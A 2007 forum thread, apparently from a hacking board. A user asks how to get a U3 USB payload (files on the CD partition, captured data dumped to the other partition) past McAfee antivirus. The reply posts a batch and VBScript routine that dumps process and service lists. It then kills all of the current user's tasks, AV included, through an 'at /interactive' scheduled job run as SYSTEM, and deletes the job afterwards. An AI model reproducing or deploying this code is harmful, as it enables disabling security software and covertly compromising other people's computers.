setzer1411 Posted May 22, 2007 Share Posted May 22, 2007 OK I have been reading the forum, and i cant seem to find a way to get past the anti virus software (Mcafee). I am using the payload designed by - GonZor -, where the apps are on the CD partion of the u3, and the dump is on the other side. It is quit possible that I am just an idiot and have overlooked the thread. Any pointers or suggestions (criticism lol) are very welcome. Quote Link to comment Share on other sites More sharing options...
operat0r_001 Posted July 20, 2007 Share Posted July 20, 2007 beat antivirus ? here some codes to get your process/service killing on.. @echo off echo =========================================== echo reportNkillall.exe 3.0 echo This program will dump to a txt file (process file dll, startup and services items to ... echo %userprofile%desktopDLLLIST.TXT echo after the dump is complete it will try and kill all task that are under %user% echo NOTE: ( you may need to press CTRL+ALT+DEL ) to run explore again echo =========================================== echo http://rmccurdy.com LISTDLLS.exe > "%userprofile%desktopDLLLIST.TXT" sc query state= all | find "NAME" >> "%userprofile%desktopDLLLIST.TXT" autorunsc.exe >> "%userprofile%desktopDLLLIST.TXT" copy cax.exe %temp% echo c:cax.exe /killuser %USERNAME% > c:kill.bat RUNAS_SYSTEM.vbs RUNAS_SYSTEM.vbs set WshShell = CreateObject("WScript.Shell") WshShell.Run ("at " & hour(now) & ":" & minute(now)+1 & "am /interactive cmd.exe /c c:kill.bat") WshShell.Run ("at " & hour(now) & ":" & minute(now)+1 & "pm /interactive cmd.exe /c c:kill.bat") WScript.Sleep 65000 WshShell.Run ("at /delete /yes") Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.